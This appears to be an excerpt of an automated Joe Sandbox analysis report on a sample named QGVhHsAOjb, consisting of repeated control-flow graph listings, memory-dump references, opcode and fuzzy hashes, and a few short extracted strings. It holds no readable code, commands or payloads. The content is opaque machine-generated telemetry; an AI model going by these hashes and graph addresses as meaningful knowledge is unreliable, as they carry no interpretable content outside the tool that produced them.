                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: f470ff1bf669b7cdd30d1cbddfc0b9328d2edb46bb969a22bb53ec9840aedd6f
                                                                                                                                            • Instruction ID: 3680d746c1d292e803abf6cadab3c844fb5a2bffba256954bc400f2a6981dcae
                                                                                                                                            • Opcode Fuzzy Hash: f470ff1bf669b7cdd30d1cbddfc0b9328d2edb46bb969a22bb53ec9840aedd6f
                                                                                                                                            • Instruction Fuzzy Hash: E191A574E05258CFDB54DFAAD844A9EFBF2BF89300F14806AE819AB365DB309945CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 972 305c468-305c46d 973 305c4e6-305c57c call 30541a0 call 3053cc0 972->973 974 305c46f-305c476 972->974 988 305c583-305c5a4 call 3055658 973->988 989 305c57e 973->989 975 305c479-305c498 974->975 976 305c478 974->976 977 305c49f-305c4e4 975->977 978 305c49a 975->978 976->975 977->973 978->977 991 305c5a9-305c5b4 988->991 989->988 992 305c5b6 991->992 993 305c5bb-305c5bf 991->993 992->993 994 305c5c4-305c5cb 993->994 995 305c5c1-305c5c2 993->995 996 305c5d2-305c5e0 994->996 997 305c5cd 994->997 998 305c5e3-305c627 995->998 996->998 997->996 1002 305c68d-305c6a4 998->1002 1004 305c6a6-305c6cb 1002->1004 1005 305c629-305c63f 1002->1005 1012 305c6e3 1004->1012 1013 305c6cd-305c6e2 1004->1013 1009 305c641-305c64d 1005->1009 1010 305c669 1005->1010 1014 305c657-305c65d 1009->1014 1015 305c64f-305c655 1009->1015 1011 305c66f-305c68c 1010->1011 1011->1002 1013->1012 1016 305c667 1014->1016 1015->1016 1016->1011
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 4e1a10bbf62e81df2838f68b1d4a7a86d4bab3d7eb43b201f1fc2234112039f2
                                                                                                                                            • Instruction ID: 49c1969b47d471675c53fcab6846642a0614d616235e9250e77cb4cdca13e1a2
                                                                                                                                            • Opcode Fuzzy Hash: 4e1a10bbf62e81df2838f68b1d4a7a86d4bab3d7eb43b201f1fc2234112039f2
                                                                                                                                            • Instruction Fuzzy Hash: 5581A474E01218CFEB54DFAAD944A9EBBF2FF88310F14D069E819AB265DB305981CF51

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1180 3055370-3055376 1181 305537d-305537e 1180->1181 1182 3055378-305537a 1180->1182 1183 3055381-30553a0 1181->1183 1185 3055380 1181->1185 1182->1183 1184 305537c 1182->1184 1186 30553a7-3055484 call 30541a0 call 3053cc0 1183->1186 1187 30553a2 1183->1187 1184->1181 1185->1183 1197 3055486 1186->1197 1198 305548b-30554a9 1186->1198 1187->1186 1197->1198 1228 30554ac call 3055649 1198->1228 1229 30554ac call 3055658 1198->1229 1199 30554b2-30554bd 1200 30554c4-30554c8 1199->1200 1201 30554bf 1199->1201 1202 30554cd-30554d4 1200->1202 1203 30554ca-30554cb 1200->1203 1201->1200 1205 30554d6 1202->1205 1206 30554db-30554e9 1202->1206 1204 30554ec-3055530 1203->1204 1210 3055596-30555ad 1204->1210 1205->1206 1206->1204 1212 3055532-3055548 1210->1212 1213 30555af-30555d4 1210->1213 1217 3055572 1212->1217 1218 305554a-3055556 1212->1218 1219 30555d6-30555eb 1213->1219 1220 30555ec 1213->1220 1223 3055578-3055595 1217->1223 1221 3055560-3055566 1218->1221 1222 3055558-305555e 1218->1222 1219->1220 1224 3055570 1221->1224 1222->1224 1223->1210 1224->1223 1228->1199 1229->1199
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 38b08f1dd79549f60caa632323cf88cb5ba86c810d76a98f3c5445c0cb8edd03
                                                                                                                                            • Instruction ID: 867a3fcb84acaaee45b9d5ae742b2c31e0ac521a4e995bc821f10c4b310b2830
                                                                                                                                            • Opcode Fuzzy Hash: 38b08f1dd79549f60caa632323cf88cb5ba86c810d76a98f3c5445c0cb8edd03
                                                                                                                                            • Instruction Fuzzy Hash: 6D81A474E01218DFDB58CFAAD954A9EBBF2FF89300F14C069E819AB265DB309945CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1230 305ccd8-305ccda 1231 305cce1-305cce4 1230->1231 1232 305ccdc-305ccde 1230->1232 1233 305cce5-305cce6 1231->1233 1232->1233 1234 305cce0 1232->1234 1235 305cce9-305cd08 1233->1235 1236 305cce8 1233->1236 1234->1231 1237 305cd0f-305cdec call 30541a0 call 3053cc0 1235->1237 1238 305cd0a 1235->1238 1236->1235 1248 305cdf3-305ce14 call 3055658 1237->1248 1249 305cdee 1237->1249 1238->1237 1251 305ce19-305ce24 1248->1251 1249->1248 1252 305ce26 1251->1252 1253 305ce2b-305ce2f 1251->1253 1252->1253 1254 305ce34-305ce3b 1253->1254 1255 305ce31-305ce32 1253->1255 1257 305ce42-305ce50 1254->1257 1258 305ce3d 1254->1258 1256 305ce53-305ce97 1255->1256 1262 305cefd-305cf14 1256->1262 1257->1256 1258->1257 1264 305cf16-305cf3b 1262->1264 1265 305ce99-305ceaf 1262->1265 1271 305cf53 1264->1271 1272 305cf3d-305cf52 1264->1272 1269 305ceb1-305cebd 1265->1269 1270 305ced9 1265->1270 1273 305cec7-305cecd 1269->1273 1274 305cebf-305cec5 1269->1274 1275 305cedf-305cefc 1270->1275 1272->1271 1276 305ced7 1273->1276 1274->1276 1275->1262 1276->1275
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: ac5dc7fb548dbfadf0c156103abb12fc1b859cdea9ff12d54d890cfb130baa37
                                                                                                                                            • Instruction ID: 7768ff0468d218da082a38cdb0e4876ee5023ce9dd25721830e2e1e67069958a
                                                                                                                                            • Opcode Fuzzy Hash: ac5dc7fb548dbfadf0c156103abb12fc1b859cdea9ff12d54d890cfb130baa37
                                                                                                                                            • Instruction Fuzzy Hash: 6F81B374E01218DFEB54CFAAD984A9EFBF2BF89300F14C069E819AB265DB305945CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1280 305ca08-305ca0a 1281 305ca11 1280->1281 1282 305ca0c-305ca0e 1280->1282 1283 305ca15-305ca16 1281->1283 1282->1283 1284 305ca10 1282->1284 1285 305ca19-305ca38 1283->1285 1286 305ca18 1283->1286 1284->1281 1287 305ca3f-305cb1c call 30541a0 call 3053cc0 1285->1287 1288 305ca3a 1285->1288 1286->1285 1298 305cb23-305cb44 call 3055658 1287->1298 1299 305cb1e 1287->1299 1288->1287 1301 305cb49-305cb54 1298->1301 1299->1298 1302 305cb56 1301->1302 1303 305cb5b-305cb5f 1301->1303 1302->1303 1304 305cb64-305cb6b 1303->1304 1305 305cb61-305cb62 1303->1305 1307 305cb72-305cb80 1304->1307 1308 305cb6d 1304->1308 1306 305cb83-305cbc7 1305->1306 1312 305cc2d-305cc44 1306->1312 1307->1306 1308->1307 1314 305cc46-305cc6b 1312->1314 1315 305cbc9-305cbdf 1312->1315 1321 305cc83 1314->1321 1322 305cc6d-305cc82 1314->1322 1318 305cbe1-305cbed 1315->1318 1319 305cc09 1315->1319 1323 305cbf7-305cbfd 1318->1323 1324 305cbef-305cbf5 1318->1324 1325 305cc0f-305cc2c 1319->1325 1322->1321 1326 305cc07 1323->1326 1324->1326 1325->1312 1326->1325
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 102908bee1327a055ff5717360aa2794ec8c1ef544f2bb53ddeaf97e9f43bf83
                                                                                                                                            • Instruction ID: 1503969d2cc01c6292e18f45536b07922aac6eff06d61209ce4def222ef89eac
                                                                                                                                            • Opcode Fuzzy Hash: 102908bee1327a055ff5717360aa2794ec8c1ef544f2bb53ddeaf97e9f43bf83
                                                                                                                                            • Instruction Fuzzy Hash: 0281B374E01218CFEB54CFAAD884A9EBBF2BF88310F14C169E819AB365DB305941CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1330 305c738-305c768 1331 305c76f-305c84c call 30541a0 call 3053cc0 1330->1331 1332 305c76a 1330->1332 1342 305c853-305c874 call 3055658 1331->1342 1343 305c84e 1331->1343 1332->1331 1345 305c879-305c884 1342->1345 1343->1342 1346 305c886 1345->1346 1347 305c88b-305c88f 1345->1347 1346->1347 1348 305c894-305c89b 1347->1348 1349 305c891-305c892 1347->1349 1351 305c8a2-305c8b0 1348->1351 1352 305c89d 1348->1352 1350 305c8b3-305c8f7 1349->1350 1356 305c95d-305c974 1350->1356 1351->1350 1352->1351 1358 305c976-305c99b 1356->1358 1359 305c8f9-305c90f 1356->1359 1365 305c9b3 1358->1365 1366 305c99d-305c9b2 1358->1366 1363 305c911-305c91d 1359->1363 1364 305c939 1359->1364 1367 305c927-305c92d 1363->1367 1368 305c91f-305c925 1363->1368 1369 305c93f-305c95c 1364->1369 1366->1365 1370 305c937 1367->1370 1368->1370 1369->1356 1370->1369
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: c8b49f4b8465f004c09aca29fda0e337592406971d5a61c434e21a1b9f301f5c
                                                                                                                                            • Instruction ID: 51023a467a3284a9fdf2d6e878eb4469e7557f40385a8c4048120f665fd90962
                                                                                                                                            • Opcode Fuzzy Hash: c8b49f4b8465f004c09aca29fda0e337592406971d5a61c434e21a1b9f301f5c
                                                                                                                                            • Instruction Fuzzy Hash: EA81A374E01218DFEB54CFAAD984A9EBBF2BF88300F14C069E819AB265DB305945CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1374 305cfab-305cfb6 1375 305cfb9-305cfd8 1374->1375 1376 305cfb8 1374->1376 1377 305cfdf-305d0bc call 30541a0 call 3053cc0 1375->1377 1378 305cfda 1375->1378 1376->1375 1388 305d0c3-305d0e4 call 3055658 1377->1388 1389 305d0be 1377->1389 1378->1377 1391 305d0e9-305d0f4 1388->1391 1389->1388 1392 305d0f6 1391->1392 1393 305d0fb-305d0ff 1391->1393 1392->1393 1394 305d104-305d10b 1393->1394 1395 305d101-305d102 1393->1395 1397 305d112-305d120 1394->1397 1398 305d10d 1394->1398 1396 305d123-305d167 1395->1396 1402 305d1cd-305d1e4 1396->1402 1397->1396 1398->1397 1404 305d1e6-305d20b 1402->1404 1405 305d169-305d17f 1402->1405 1411 305d223 1404->1411 1412 305d20d-305d222 1404->1412 1409 305d181-305d18d 1405->1409 1410 305d1a9 1405->1410 1413 305d197-305d19d 1409->1413 1414 305d18f-305d195 1409->1414 1415 305d1af-305d1cc 1410->1415 1412->1411 1416 305d1a7 1413->1416 1414->1416 1415->1402 1416->1415
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 43b07a9a3fe4fec9809efd49b6be960a69d9528fc43aae0958a188e9686f53e1
                                                                                                                                            • Instruction ID: aa2bed9423e78dcaa8411e595b74fb3597be0739c76246725e2e178c971d1f37
                                                                                                                                            • Opcode Fuzzy Hash: 43b07a9a3fe4fec9809efd49b6be960a69d9528fc43aae0958a188e9686f53e1
                                                                                                                                            • Instruction Fuzzy Hash: 44819774E01218DFDB54DFAAD984A9DBBF2BF88300F14D06AE819AB365DB309945CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 884bb2438bc0c903150d58580cf4dff34a939c46eb3aba1eb710d0284e1b5c0c
                                                                                                                                            • Instruction ID: 0c300f9b68f07f3772bb27577a146d89a2c0cb05f8d3e57ea67ffafa4d3ffc56
                                                                                                                                            • Opcode Fuzzy Hash: 884bb2438bc0c903150d58580cf4dff34a939c46eb3aba1eb710d0284e1b5c0c
                                                                                                                                            • Instruction Fuzzy Hash: A9E12574D05219CFDB68DFA5D858BAEBBB2FF49301F1084AAE809A7354DB745981CF10
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6b22e828131180fcd067149b5046cc3b740b4a524cb9fe421b0156410cc6ac2a
                                                                                                                                            • Instruction ID: 1af10428494d57b7447f74d5e4afc7a880d78b6c30e2c1bbc067633466e8de69
                                                                                                                                            • Opcode Fuzzy Hash: 6b22e828131180fcd067149b5046cc3b740b4a524cb9fe421b0156410cc6ac2a
                                                                                                                                            • Instruction Fuzzy Hash: 9951B774E01208DFDB18DFAAD544A9EBBB2FF88300F248429E819AB364DB315945CF14
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b6b26e67e19593586015d4f8290d7cf8a24e2c81d9337306da4f181f10aea179
                                                                                                                                            • Instruction ID: 17ce9cdf8c3f223eda90185da73bb4ff39d5b2cf69e5d9d2ff9e5be39782fddc
                                                                                                                                            • Opcode Fuzzy Hash: b6b26e67e19593586015d4f8290d7cf8a24e2c81d9337306da4f181f10aea179
                                                                                                                                            • Instruction Fuzzy Hash: D5519674E01208DFDB18DFAAD544A9EBBF2FF88300F249429E815AB364DB315945CF54

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 30576f1-30576f2 1 30576f4-30576f8 0->1 2 30576f9-30576fa 0->2 1->2 3 3057701-3057725 2->3 4 30576fc-30576fd 2->4 5 3057b54-3057b58 3->5 6 305772b-305774e 3->6 4->3 7 3057b71-3057b7f 5->7 8 3057b5a-3057b6e 5->8 15 3057754-3057761 6->15 16 30577fc-3057800 6->16 13 3057b81-3057b96 7->13 14 3057bf0-3057c05 7->14 21 3057b9d-3057baa 13->21 22 3057b98-3057b9b 13->22 23 3057c07-3057c0a 14->23 24 3057c0c-3057c19 14->24 32 3057770 15->32 33 3057763-305776e 15->33 17 3057802-3057810 16->17 18 3057848-3057851 16->18 17->18 40 3057812-305782d 17->40 25 3057c67 18->25 26 3057857-3057861 18->26 28 3057bac-3057bed 21->28 22->28 29 3057c1b-3057c56 23->29 24->29 34 3057c6c-3057c7a 25->34 26->5 30 3057867-3057870 26->30 85 3057c5d-3057c64 29->85 38 3057872-3057877 30->38 39 305787f-305788b 30->39 35 3057772-3057774 32->35 33->35 50 3057c81-3057c82 34->50 51 3057c7c-3057c80 34->51 35->16 42 305777a-30577dc 35->42 38->39 39->34 45 3057891-3057897 39->45 65 305782f-3057839 40->65 66 305783b 40->66 94 30577e2-30577f9 42->94 95 30577de 42->95 47 305789d-30578ad 45->47 48 3057b3e-3057b42 45->48 63 30578c1-30578c3 47->63 64 30578af-30578bf 47->64 48->25 53 3057b48-3057b4e 48->53 56 3057c83-3057c85 50->56 57 3057c89-3057c9c 50->57 51->50 53->5 53->30 73 3057cb5-3057cbc 57->73 74 3057c9e-3057cb4 57->74 67 30578c6-30578cc 63->67 64->67 68 305783d-305783f 65->68 66->68 67->48 70 30578d2-30578e1 67->70 68->18 71 3057841 68->71 79 30578e7 70->79 80 305798f-30579ba call 3057538 * 2 70->80 71->18 82 30578ea-30578fb 79->82 98 3057aa4-3057abe 80->98 99 30579c0-30579c4 80->99 82->34 87 3057901-3057913 82->87 87->34 89 3057919-3057931 87->89 152 3057933 call 30580c9 89->152 153 3057933 call 30580d8 89->153 92 3057939-3057949 92->48 97 305794f-3057952 92->97 94->16 95->94 100 3057954-305795a 97->100 101 305795c-305795f 97->101 98->5 121 3057ac4-3057ac8 98->121 99->48 103 30579ca-30579ce 99->103 100->101 104 3057965-3057968 100->104 101->25 101->104 106 30579f6-30579fc 103->106 107 30579d0-30579dd 103->107 108 3057970-3057973 104->108 109 305796a-305796e 104->109 110 3057a37-3057a3d 106->110 111 30579fe-3057a02 106->111 124 30579ec 107->124 125 30579df-30579ea 107->125 108->25 112 3057979-305797d 108->112 109->108 109->112 115 3057a3f-3057a43 110->115 116 3057a49-3057a4f 110->116 111->110 114 3057a04-3057a0d 111->114 112->25 113 3057983-3057989 112->113 113->80 113->82 119 3057a1c-3057a32 114->119 120 3057a0f-3057a14 114->120 115->85 115->116 122 3057a51-3057a55 116->122 123 3057a5b-3057a5d 116->123 119->48 120->119 127 3057b04-3057b08 121->127 128 3057aca-3057ad4 call 30563e0 121->128 122->48 122->123 129 3057a92-3057a94 123->129 130 3057a5f-3057a68 123->130 126 30579ee-30579f0 124->126 125->126 126->48 126->106 127->85 135 3057b0e-3057b12 127->135 128->127 140 3057ad6-3057aeb 128->140 129->48 133 3057a9a-3057aa1 129->133 131 3057a77-3057a8d 130->131 132 3057a6a-3057a6f 130->132 131->48 132->131 135->85 138 3057b18-3057b25 135->138 144 3057b34 138->144 145 3057b27-3057b32 138->145 140->127 149 3057aed-3057b02 140->149 146 3057b36-3057b38 144->146 145->146 146->48 146->85 149->5 149->127 152->92 153->92
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                            • API String ID: 0-1932283790
                                                                                                                                            • Opcode ID: 03538d2a324ac0a2621938d2c927c0c8dd65c7ff723048a5be2b041637528480
                                                                                                                                            • Instruction ID: 2b34b0ef5fdbf5318dbfb3c30a2c1408ca239a62b39a8a3bd405bedfeec5579c
                                                                                                                                            • Opcode Fuzzy Hash: 03538d2a324ac0a2621938d2c927c0c8dd65c7ff723048a5be2b041637528480
                                                                                                                                            • Instruction Fuzzy Hash: 36126A30A012099FCB65CF68D984AAEBBF2FF89714F188599F8199B361D731ED41CB50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 688 3055f38-3055f5a 690 3055f70-3055f7b 688->690 691 3055f5c-3055f60 688->691 694 3055f81-3055f83 690->694 695 3056023-305604f 690->695 692 3055f62-3055f6e 691->692 693 3055f88-3055f8f 691->693 692->690 692->693 697 3055f91-3055f98 693->697 698 3055faf-3055fb8 693->698 696 305601b-3056020 694->696 701 3056056-3056098 695->701 697->698 700 3055f9a-3055fa5 697->700 776 3055fba call 3055f38 698->776 777 3055fba call 3055f2b 698->777 700->701 702 3055fab-3055fad 700->702 721 30560cb-30560cf 701->721 722 305609a 701->722 702->696 703 3055fc0-3055fc2 704 3055fc4-3055fc8 703->704 705 3055fca-3055fd2 703->705 704->705 707 3055fe5-3056004 call 30569a0 704->707 708 3055fd4-3055fd9 705->708 709 3055fe1-3055fe3 705->709 715 3056006-305600f 707->715 716 3056019 707->716 708->709 709->696 773 3056011 call 305aef0 715->773 774 3056011 call 305afad 715->774 775 3056011 call 305aebb 715->775 716->696 718 3056017 718->696 725 30560d5-30560d9 721->725 726 3056163-3056165 721->726 723 30560a1-30560ae 722->723 724 305609c 722->724 727 30560b0-30560b6 723->727 728 30560bd-30560c1 723->728 724->723 729 30560e9-30560f6 725->729 730 30560db-30560e7 725->730 771 3056167 call 3056300 726->771 772 3056167 call 30562f0 726->772 727->728 728->721 736 30560f8-3056102 729->736 730->736 731 305616d-3056173 734 3056175-305617b 731->734 735 305617f-3056186 731->735 737 30561e1-3056240 734->737 738 305617d 734->738 741 3056104-3056113 736->741 742 305612f-3056133 736->742 750 3056247-305625b 737->750 738->735 753 3056115-305611c 741->753 754 3056123-305612d 741->754 743 3056135-305613b 742->743 744 305613f-3056143 742->744 746 305613d 743->746 747 3056189-30561da 743->747 744->735 748 3056145-3056149 744->748 746->735 747->737 748->750 751 305614f-3056161 748->751 751->735 753->754 754->742 771->731 772->731 773->718 774->718 775->718 776->703 777->703
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                            • Opcode ID: 73a043dcd4ed6f5b07e9d3243476ce125ea8b0dd3d9afd3653f2da030d519071
                                                                                                                                            • Instruction ID: f9a6db6e9c4f3c56374d42baefb1c9f5fb4d41894fadc1a5b5c7be265ab7fd53
                                                                                                                                            • Opcode Fuzzy Hash: 73a043dcd4ed6f5b07e9d3243476ce125ea8b0dd3d9afd3653f2da030d519071
                                                                                                                                            • Instruction Fuzzy Hash: 67919C313042599FDB19EF28C85867FBBE6BF89300F189569E946CB395CF358842C791

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 779 3056498-30564a5 780 30564a7-30564ab 779->780 781 30564ad-30564af 779->781 780->781 782 30564b4-30564bf 780->782 783 30566c0-30566c7 781->783 784 30564c5-30564cc 782->784 785 30566c8 782->785 786 3056661-3056667 784->786 787 30564d2-30564e1 784->787 789 30566cd-30566d9 785->789 790 305666d-3056671 786->790 791 3056669-305666b 786->791 788 30564e7-30564f6 787->788 787->789 800 30564f8-30564fb 788->800 801 305650b-305650e 788->801 798 30566e1 789->798 799 30566dc-30566e0 789->799 792 3056673-3056679 790->792 793 30566be 790->793 791->783 792->785 796 305667b-305667e 792->796 793->783 796->785 797 3056680-3056695 796->797 821 3056697-305669d 797->821 822 30566b9-30566bc 797->822 805 30566e2 798->805 806 30566e9-3056705 798->806 799->798 804 3056718-305671a 799->804 803 305651a-3056520 800->803 807 30564fd-3056500 800->807 802 3056510-3056513 801->802 801->803 809 3056515 802->809 810 3056566-305656c 802->810 811 3056522-3056528 803->811 812 3056538-3056555 803->812 814 305671c-305672e 804->814 815 305672f-3056736 804->815 805->806 813 30566e4-30566e5 805->813 832 3056707-305670c 806->832 833 305670e-3056712 806->833 816 3056506 807->816 817 3056601-3056607 807->817 818 305662c-3056639 809->818 819 3056584-3056596 810->819 820 305656e-3056574 810->820 823 305652c-3056536 811->823 824 305652a 811->824 857 305655e-3056561 812->857 813->806 816->818 826 305661f-3056629 817->826 827 3056609-305660f 817->827 844 305664d-305664f 818->844 845 305663b-305663f 818->845 847 30565a6-30565c9 819->847 848 3056598-30565a4 819->848 828 3056576 820->828 829 3056578-3056582 820->829 830 30566af-30566b2 821->830 831 305669f-30566ad 821->831 822->783 823->812 824->812 826->818 835 3056611 827->835 836 3056613-305661d 827->836 828->819 829->819 830->785 841 30566b4-30566b7 830->841 831->785 831->830 832->804 833->804 835->826 836->826 841->821 841->822 852 3056653-3056656 844->852 845->844 851 3056641-3056645 845->851 847->785 860 30565cf-30565d2 847->860 858 30565f1-30565ff 848->858 851->785 853 305664b 851->853 852->785 854 3056658-305665b 852->854 853->852 854->786 854->787 857->818 858->818 860->785 862 30565d8-30565ea 860->862 862->858
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,bq$,bq
                                                                                                                                            • API String ID: 0-2699258169
                                                                                                                                            • Opcode ID: eaa214d86b4c0ef66cf6de88809c5aa5a36d94a0a48ad476c998b6c64c7ea944
                                                                                                                                            • Instruction ID: c1d92bc8f0ca317bab5a9be5616a32a99d56624fdc5571b10227e5254519d22e
                                                                                                                                            • Opcode Fuzzy Hash: eaa214d86b4c0ef66cf6de88809c5aa5a36d94a0a48ad476c998b6c64c7ea944
                                                                                                                                            • Instruction Fuzzy Hash: E3818034A02509CFCB54CF69C48896FFBF6BF89210B999569E805DB364DB32EC41CB51

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
